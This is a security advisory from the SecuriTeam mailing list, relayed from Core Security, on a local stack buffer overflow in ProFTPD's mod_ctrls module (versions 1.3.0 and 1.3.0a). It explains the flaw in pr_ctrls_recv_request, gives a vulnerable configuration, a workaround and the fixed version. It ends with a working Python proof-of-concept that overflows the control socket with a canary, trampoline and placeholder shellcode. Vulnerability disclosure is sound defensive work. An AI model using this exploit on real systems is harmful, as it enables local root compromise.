The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ProFTPD Controls Buffer Overflow
------------------------------------------------------------------------
SUMMARY
A locally exploitable stack overflow vulnerability has been found in the
mod_ctrls module of ProFTPD server.
ProFTPD is a commonly used and highly configurable FTP server for Unix and
Windows systems. This server is available as an optional package in most
recent Linux distributions, including Debian (sid), Mandriva 2007 and
Ubuntu Edgy. For more information concerning ProFTPD, refer to the site
http <://www.proftpd.org/> ://www.proftpd.org/
The vulnerability is located in the "Controls" module. This is an optional
feature of ProFTPD server, that must be activated in the configuration
file. Controls are a way to communicate directly with a standalone ProFTPD
daemon while it is running. This provides administrators a way to alter
the daemon's behavior in real time, without having to restart the daemon
and have it re-read its configuration. The Controls feature allow
authorized users to locally manage parameters of the ProFTPD servers, like
aborting connections, managing users, changing log levels, disabling
individual virtual servers, etc.
The vulnerability allows local attackers with access to the Controls
features (and who have been allowed by Controls ACLs in proftpd.conf) to
gain root privileges.
DETAILS
Vulnerable Systems:
* ProFTPD version 1.3.0a
* ProFTPD version 1.3.0
Immune Systems:
* ProFTPD version 1.3.1rc1
Technical Description - Exploit/Concept Code:
The vulnerability exists in pr_ctrls_recv_request() function from
src/ctrls.c
Analysis of the vulnerability follows:
(Code from ProFTPD 1.3.0a, src/ctrls.c )
int pr_ctrls_recv_request(pr_ctrls_cl_t *cl) {
pr_ctrls_t *ctrl = NULL, *next_ctrl = NULL;
char reqaction[512] = {'\0'}, *reqarg = NULL;
size_t reqargsz = 0;
unsigned int nreqargs = 0, reqarglen = 0;
.
.
.
/* Next, read in the requested number of arguments. The client sends
* the arguments in pairs: first the length of the argument, then the
* argument itself. The first argument is the action, so get the first
* matching pr_ctrls_t (if present), and add the remaining arguments to
it.
*/
(1)
if (read(cl->cl_fd, &reqarglen, sizeof(unsigned int)) < 0) {
pr_signals_unblock();
return -1;
}
(2)
if (read(cl->cl_fd, reqaction, reqarglen) < 0) {
pr_signals_unblock();
return -1;
}
.
.
.
}
In (1) the integer 'reqarglen' is fully controlled by the attacker, as
it's read directly from the control socket. This allows an attacker to
control how much we read into the 'reqaction' variable in (2) (this
variable is in the stack).
Example of vulnerable configuration in proftpd.conf:
<IfModule mod_ctrls.c>
ControlsEngine on
ControlsACLs all allow group someuser
ControlsMaxClients 2
ControlsLog /var/log/proftpd/controls.log
ControlsInterval 5
ControlsSocket /tmp/ctrls.sock
ControlsSocketOwner someuser someuser
ControlsSocketACL allow group someuser
</IfModule>
ProFTPD must be compiled with mod_ctrls support ( --enable-ctrls ).
The following is a simple working proof-of-concept (Python).
References:
For more information concerning the Controls module, refer to
<http://www.castaglia.org/proftpd/doc/contrib/ProFTPD-mini-HOWTO-Controls.html>
http://www.castaglia.org/proftpd/doc/contrib/ProFTPD-mini-HOWTO-Controls.html
Solution/Vendor Information/Workaround:
As a workaround, turn off the module mod_ctrls, with the following lines
added to proftpd.conf:
<IfModule mod_ctrls.c>
ControlsEngine off
</IfModule>
Alternatively, administrators can use the ControlsACLs directive in
proftpd.conf to restrict access only to trusted local users.
Version 1.3.1rc1 of ProFTPD, which fixes this issue, is available on the
<http://www.proftpd.org/> ProFTPD site.
Exploit:
# Core Security Technologies - Corelabs Advisory
# ProFTPD Controls buffer overflow
import socket
import os, os.path,stat
#This works with default proftpd 1.3.0a compiled with gcc 4.1.2 (ubuntu
edgy)
#
ctrlSocket = "/tmp/ctrls.sock"
mySocket = "/tmp/notused.sock"
canary = "\0\0\x0a\xff"
trampoline = "\x77\xe7\xff\xff" # jmp ESP on vdso
shellcode = "\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc" # inocuous "int 3"
#Build Payload. The format on the stack is:
#
#AAAA = EBX BBBB = ESI CCCC = EDI DDDD = EBP EEEE = EIP
payload = ("A"*512) + canary + "AAAABBBBCCCCDDDD" + trampoline + shellcode
#Setup socket
#
if os.path.exists(mySocket):
os.remove(mySocket)
s = socket.socket(socket.AF_UNIX,socket.SOCK_STREAM)
s.bind(mySocket)
os.chmod(mySocket,stat.S_IRWXU)
s.connect(ctrlSocket)
#Send payload
#
s.send("\1\0\0\0")
s.send("\1\0\0\0")
l = len(payload)
s.send(chr(l & 255)+chr((l/255) & 255)+"\0\0")
s.send(payload)
#Finished
#
s.close()
ADDITIONAL INFORMATION
The information has been provided by <mailto:advisories@coresecurity.com>
CORE Security Technologies Advisories.
The original article can be found at:
<http://www.coresecurity.com/?module=ContentMod&action=item&id=1594>
http://www.coresecurity.com/?module=ContentMod&action=item&id=1594
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
